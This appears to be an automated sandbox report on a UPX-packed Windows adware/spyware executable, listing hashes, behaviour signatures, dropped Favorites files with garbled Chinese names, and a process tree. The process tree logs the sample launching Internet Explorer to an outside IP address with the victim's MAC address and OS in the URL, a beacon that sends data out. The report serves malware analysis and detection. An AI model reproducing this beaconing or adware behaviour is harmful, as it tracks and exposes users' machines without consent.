Overview

overview

8

Static

static

8

06455be1ca...92.exe

windows7-x64

8

06455be1ca...92.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    147s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/12/2022, 22:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    06455be1ca70bb1fd4650a437063cdbe047eb361006144f866a5c54fd33bb192.exe

  • Size

    55KB

  • MD5

    7536d4df8fd1e80c8f840e7c21ce9ad4

  • SHA1

    68acf14a13691784aab1100d7b543092a49a70cf

  • SHA256

    06455be1ca70bb1fd4650a437063cdbe047eb361006144f866a5c54fd33bb192

  • SHA512

    22c955aa495d4551609610333fcdd24e4a93ea502b86856bad9d729a23a59e75674fb262c9818776f93d27a404cf49c2c17bac9aec2a3492b23ab4956536e41e

  • SSDEEP

    1536:qaREAVLhLiM/xhfMLzaLa6hIAsdxn6sM0TZMl9Vn:BvLJTphfKp6hIAsdxn6sM0TZMl9Vn

Score
8/10
upx

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\06455be1ca70bb1fd4650a437063cdbe047eb361006144f866a5c54fd33bb192.exe
    "C:\Users\Admin\AppData\Local\Temp\06455be1ca70bb1fd4650a437063cdbe047eb361006144f866a5c54fd33bb192.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3528
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=4a-a9-25-75-f9-81&os=Microsoft Windows XP&flag=ccc921d7cd9214f1199758fe42cba58c&user=06455be1ca70bb1fd4650a437063cdbe047eb361006144f866a5c54fd33bb192
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4708
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4708 CREDAT:17410 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:4596

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\Favorites\45575.comÔÚÏßµÄСÓÎÏ·.×îºÃÍæ×îÐÂ×î¿ì¿á³¬¼¶Ð¡ÓÎÏ·!.html
    Filesize

    259B

    MD5

    9eb23c46d269c9debb4345e011e07a4c

    SHA1

    1af312d49b19680ba9776e003aced6602937900f

    SHA256

    f6711066243605d4efa6c1015a4dab4d4e57063a2b84513b665d795bd572c047

    SHA512

    d39d84d0b2b0d9ec520aecbb5dcf26b5b7809048bc895c20c503ac370127f4d56af50ff525843b3bc31f1eef22c6bdae9c672a81b8591f9d1350e343c881ef23

    Download Submit

  • C:\Users\Admin\Favorites\°¬³ÈÅ®×°--×îÃÀÀöʱÉеÄÅ®×°Æ·ÅÆ.ÃÀÅ®ÂòÒ£¬Ãëɱ°¬³ÈÅ®×°!!.html
    Filesize

    261B

    MD5

    7bd1b88f31a6da5622837b47f26c9d3a

    SHA1

    8dfae3dcb5c0e295aa1d1b273af830e4f54d3d10

    SHA256

    6e3a41335a892b2dd58ede098db183b04e58a95b44c51e5de96fa07de0d02085

    SHA512

    8347d358c0157a57958242938c3e844f050b5a7e77d14ae1f7a99a6508766160b8e59bb5a94c5993d5a4c9ea901b1988c35648c9b8fd447589684f599b6ff443

    Download Submit

  • C:\Users\Admin\Favorites\µ±µ±Íø¡ªÍøÉϹºÎïÖÐÐÄ.html
    Filesize

    261B

    MD5

    0d4670b01f65bc72dbf1af3b36ef4f2d

    SHA1

    97553344d494e9b52990d3e1de18db8d1bbc8744

    SHA256

    306a437106117981a9b66c57946da8388998cda83870657b63b0858e8ae12d39

    SHA512

    217d351fa2416443f180efc75ee6306da701a5feae1ad779bbb57682e314b7a310ad0db27f2e0815c936713bbe816086a3d1bbdc9d48cc08afc8d33f0b5702b6

    Download Submit

  • C:\Users\Admin\Favorites\¿´¿´µçÊÓ¾çÔÚÏß´óÈ«,,,×îºÃÂÌÉ«×îиßËÙÃâ·ÑµçÊÓ¾çÍøÕ¾!.html
    Filesize

    266B

    MD5

    c81a8562bf7c8401b8052977fe6e802a

    SHA1

    e54c0e0b91d5a861b20548d30a2ffd350abfac09

    SHA256

    8d101ea02c9bce0d4d091b247546d4caccd887752b6f4c3b44a0f8956c303fda

    SHA512

    f9c855217976830f76a42561ddb181cbc8879a0327db7940715d3e377dd047dbd9c0852c68751dfd9a6e2f564f10338820c02c98f73ffc0a5ed9dd50fc1652cb

    Download Submit

  • C:\Users\Admin\Favorites\ÃÀÅ®·áÐØ´óÃؾ÷-20ÌìÄÚѸËÙÔö´ó´ó´ó!.html
    Filesize

    271B

    MD5

    e5c8bb1ba6bc6de3d4ddac2f0bf47e7d

    SHA1

    70900371edfcdcb01b063e731e56d129369c64a8

    SHA256

    334812944df9a9938b114b7ec02177c4bdb6cbb8dd362ea43d119a37feb2062f

    SHA512

    c3635728cb6e5327276220b57bab8c6068b50130250f8151c06134f17e143067feb04e2f47cecf6fca0d6c046325012492c67d3837ea3e57a516e0b7c4408769

    Download Submit

  • C:\Users\Admin\Favorites\ÌÔ±¦Íø - ÌÔ£¡ÎÒϲ»¶.html
    Filesize

    261B

    MD5

    c6140fc6cd1250bd67a4a22d7c74ec54

    SHA1

    d8371058038d78bd6d5dd8c13bafa21d236cf3e7

    SHA256

    a18fe5781913c54cf547f8bed109aa7de0961189bc7ee91e0a1851b6ca9d0610

    SHA512

    aa50040890a99db0d083674297f19c23f083934bbcc4eb30ee1ec358aa4418e2b017d2bd4314e9ed9d115e710637c82899915897118bc47c1e4edac8858cd3f7

    Download Submit

  • C:\Users\Admin\Favorites\Öйú¸£Àû²ÊƱ£¬ÌåÓý²ÊƱµÄͶעÖÐÐÄ.²ÊƱ´óÓ®¼Ò£¡.html
    Filesize

    261B

    MD5

    1dd93ff89bb660ccd77ec626a0cd052a

    SHA1

    b895b52dc80ac06edf398e538d1b82ae88df554a

    SHA256

    13aa3b6e21889b5f35f27aed509a62deea1c40de9cf1f9730328157dc00d8c9e

    SHA512

    254e5f9db48ccb6f293beb7865f21449bcdc151fed0f6b5dafba7dc7e52ac5829a50af3132c46832ad68f20e9d2b6f64c7b973a79b09e1b4d601033ae99e375e

    Download Submit

  • C:\Users\Admin\Favorites\׿ԽÑÇÂíÑ·ÍøÉϹºÎïͼÊ飬ÊÖ»ú£¬ÊýÂ룬¼Òµç£¬»¯×±Æ·£¬ÖÓ±í£¬Ê×ÊεÈÔÚÏßÏúÊÛ.html
    Filesize

    261B

    MD5

    8c9d533856807659bd89d3a99b1bedfc

    SHA1

    a55b51b5f91bea060463db9266dd6dbbc1de6ef5

    SHA256

    dd59719dc8255bddc6dcb6f54e27ab82b8f0285280379c8a90d5043d657f16fa

    SHA512

    2d8bb0fae1e09094b7e08b0c4dea5e4b9cf97cbf25638df1a7db14b113e6ab8a95f160a7ada024700f048962c2baf7bf963d16b783a45b83d1d20399cc81d158

    Download Submit

  • C:\Users\Admin\Favorites\×îм«Æ·ÂÌÉ«ºÃµÄµçÓ°¿âÃâ·Ñ.¸ßÇå¸ßËÙ£¡ÌìÌì¸üÐÂ!!.html
    Filesize

    264B

    MD5

    ee765b1ebea1c25ae9e7f3ce73841c46

    SHA1

    9a729deb3d211e8bbb0198bb5e7f436056293331

    SHA256

    2013251dc3e77710d417cc8c51fdcaa3d9e4ec7c019c55020994130639f87f65

    SHA512

    5cf9a564be444151dcc8cf960aee916bbd7c21874e98a0a594d2e40e5861bdbf2cac37d8da7c30b564529600c948feefd8eda45a0bd5e55e5d5b75fe9ac84434

    Download Submit

  • C:\Users\Admin\Favorites\×îÐÂÔÚÏßС˵Ãâ·ÑµÄÔĶÁ.·á¸»ÄÚÈÝËٶȿìµÄС˵վ!.html
    Filesize

    264B

    MD5

    428d1e753132e1fe27a06715e484ecc8

    SHA1

    62bd82694da83f087052c2cb6a8de923628f02a1

    SHA256

    42ca671a0639af6857bfe9716d48aa978210a66d98948a978066e1df90ad4377

    SHA512

    c21a1473639acc7f1c9f7847d0442d4ee5cbfa09d121f3024163af63a70968620bd16b56ccbca6dcb6447c4d01fb9df9dc5482ed29b38984a64afb39aadad317

    Download Submit

  • memory/3528-132-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download

  • memory/3528-133-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download